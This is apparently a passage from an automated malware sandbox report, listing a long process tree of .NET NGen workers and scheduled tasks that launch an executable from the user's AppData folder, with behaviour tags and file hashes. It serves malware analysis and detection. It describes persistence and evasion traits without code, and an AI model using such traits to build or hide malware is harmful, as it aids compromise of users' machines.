C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 224 -InterruptEvent 234 -NGENProcess 220 -Pipe 214 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 234 -InterruptEvent 220 -NGENProcess 22c -Pipe 230 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 220 -InterruptEvent 23c -NGENProcess 198 -Pipe 17c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 23c -InterruptEvent 198 -NGENProcess 234 -Pipe 238 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 244 -NGENProcess 22c -Pipe 224 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 22c -NGENProcess 23c -Pipe 240 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 22c -InterruptEvent 23c -NGENProcess 198 -Pipe 250 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 23c -InterruptEvent 198 -NGENProcess 1f4 -Pipe 24c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 198 -InterruptEvent 254 -NGENProcess 244 -Pipe 208 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 244 -NGENProcess 23c -Pipe 220 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 25c -NGENProcess 1f4 -Pipe 22c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 1f4 -NGENProcess 254 -Pipe 258 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 264 -NGENProcess 23c -Pipe 198 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 23c -NGENProcess 25c -Pipe 260 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 23c -InterruptEvent 26c -NGENProcess 254 -Pipe 244 -Comment "NGen Worker Process"2⤵
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 254 -NGENProcess 264 -Pipe 268 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 254 -InterruptEvent 274 -NGENProcess 25c -Pipe 1f4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 25c -NGENProcess 26c -Pipe 270 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 27c -NGENProcess 234 -Pipe 254 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 234 -NGENProcess 264 -Pipe 26c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 234 -InterruptEvent 284 -NGENProcess 274 -Pipe 248 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 274 -NGENProcess 27c -Pipe 23c -Comment "NGen Worker Process"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 28c -NGENProcess 264 -Pipe 25c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 290 -NGENProcess 288 -Pipe 218 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 294 -NGENProcess 27c -Pipe 234 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 298 -NGENProcess 264 -Pipe 25c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 29c -NGENProcess 288 -Pipe 284 -Comment "NGen Worker Process"2⤵
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 29c -InterruptEvent 288 -NGENProcess 294 -Pipe 27c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 294 -NGENProcess 274 -Pipe 264 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 2a8 -NGENProcess 2a0 -Pipe 290 -Comment "NGen Worker Process"2⤵
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 2a0 -NGENProcess 288 -Pipe 2a4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 2b0 -NGENProcess 274 -Pipe 29c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 2a8 -NGENProcess 2b8 -Pipe 2a0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 28c -NGENProcess 274 -Pipe 294 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 2bc -NGENProcess 2b0 -Pipe 278 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2bc -InterruptEvent 2c0 -NGENProcess 2a8 -Pipe 2b4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2c0 -NGENProcess 2bc -Pipe 2b0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 2ac -NGENProcess 2a8 -Pipe 288 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 2cc -NGENProcess 2b8 -Pipe 274 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 2d4 -NGENProcess 2bc -Pipe 2d0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2dc -NGENProcess 28c -Pipe 2d8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 2cc -NGENProcess 2e0 -Pipe 2d4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 2cc -NGENProcess 2c8 -Pipe 28c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 2a8 -NGENProcess 2e0 -Pipe 2bc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 2a8 -NGENProcess 2cc -Pipe 2c4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 2ac -NGENProcess 2e0 -Pipe 2e4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 2f0 -NGENProcess 2e8 -Pipe 2ac -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f0 -InterruptEvent 2dc -NGENProcess 2e0 -Pipe 2ec -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 2e0 -NGENProcess 2b8 -Pipe 2fc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 2c8 -NGENProcess 2f8 -Pipe 2f4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 300 -NGENProcess 2f0 -Pipe 2cc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 300 -InterruptEvent 304 -NGENProcess 2b8 -Pipe 2a8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 308 -InterruptEvent 2c8 -NGENProcess 30c -Pipe 300 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 2c0 -NGENProcess 2b8 -Pipe 2dc -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 308 -NGENProcess 314 -Pipe 2c8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 304 -NGENProcess 318 -Pipe 310 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 2e0 -NGENProcess 314 -Pipe 2f0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 31c -NGENProcess 308 -Pipe 30c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 320 -NGENProcess 318 -Pipe 2f8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 324 -NGENProcess 2e0 -Pipe 320 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 324 -NGENProcess 304 -Pipe 318 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 2e8 -NGENProcess 328 -Pipe 324 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e8 -InterruptEvent 328 -NGENProcess 330 -Pipe 334 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 328 -InterruptEvent 308 -NGENProcess 2c0 -Pipe 31c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 308 -InterruptEvent 338 -NGENProcess 32c -Pipe 314 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 338 -InterruptEvent 33c -NGENProcess 330 -Pipe 304 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 340 -NGENProcess 2c0 -Pipe 2e0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 338 -NGENProcess 348 -Pipe 33c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 338 -InterruptEvent 2e8 -NGENProcess 2c0 -Pipe 328 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 34c -InterruptEvent 344 -NGENProcess 350 -Pipe 338 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 2b8 -NGENProcess 2c0 -Pipe 308 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 354 -NGENProcess 2e8 -Pipe 330 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 354 -InterruptEvent 358 -NGENProcess 350 -Pipe 338 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 35c -NGENProcess 2c0 -Pipe 340 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 2c0 -NGENProcess 2b8 -Pipe 364 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 34c -NGENProcess 360 -Pipe 344 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 368 -InterruptEvent 35c -NGENProcess 36c -Pipe 2c0 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 348 -NGENProcess 360 -Pipe 2e8 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 370 -InterruptEvent 368 -NGENProcess 374 -Pipe 35c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 368 -InterruptEvent 350 -NGENProcess 360 -Pipe 354 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 378 -InterruptEvent 350 -NGENProcess 368 -Pipe 348 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 350 -InterruptEvent 2b8 -NGENProcess 360 -Pipe 358 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 380 -NGENProcess 370 -Pipe 36c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 380 -InterruptEvent 384 -NGENProcess 368 -Pipe 37c -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 388 -NGENProcess 360 -Pipe 34c -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 380 -NGENProcess 390 -Pipe 384 -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 380 -InterruptEvent 378 -NGENProcess 360 -Pipe 350 -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 374 -InterruptEvent 38c -NGENProcess 394 -Pipe 380 -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 384 -NGENProcess 360 -Pipe 368 -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 360 -NGENProcess 374 -Pipe 378 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 360 -InterruptEvent 390 -NGENProcess 398 -Pipe 15c -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 390 -NGENProcess 360 -Pipe 388 -Comment "NGen Worker Process"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 390 -InterruptEvent 3a0 -NGENProcess 3a8 -Pipe 39c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 38c -NGENProcess 360 -Pipe 394 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 3ac -NGENProcess 370 -Pipe 374 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 3a0 -NGENProcess 3b4 -Pipe 38c -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 398 -NGENProcess 370 -Pipe 3a4 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 3b8 -NGENProcess 3ac -Pipe 384 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 3b8 -InterruptEvent 3bc -NGENProcess 3b4 -Pipe 390 -Comment "NGen Worker Process"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {B8A44C3A-7042-432B-BD79-C57503E29A02} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {949E2586-6E00-4647-A334-FD725C962C65} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵
-
C:\Users\Admin\AppData\Roaming\hhjjfdrC:\Users\Admin\AppData\Roaming\hhjjfdr2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\taskeng.exetaskeng.exe {7155B2AB-35E2-4EF6-AA42-870E1E41B503} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\hhjjfdrC:\Users\Admin\AppData\Roaming\hhjjfdr2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\taskeng.exetaskeng.exe {D3003385-6194-4080-B51A-6080C2D9ADFA} S-1-5-18:NT AUTHORITY\System:Service:1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu161580bf75.exeMD5
2125dd7e77f411376407cbf376de966b
SHA19c74f6d9e4083642642e1a9738b4062295df89eb
SHA256c33bcdf4fec1a287615e9c94c5c669023543e1e8947e1dc74d180aabebbb2513
SHA512a0d57cdff8f8d035639a51dd4666cd9406fab29da1af33a5b071c99d6fc6ae4bd42d8e32d7e2f9bac2644d73c82ee2140a9e42ee3d5d651989689682ae431932
-
C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu161580bf75.exeMD5
2125dd7e77f411376407cbf376de966b
SHA19c74f6d9e4083642642e1a9738b4062295df89eb
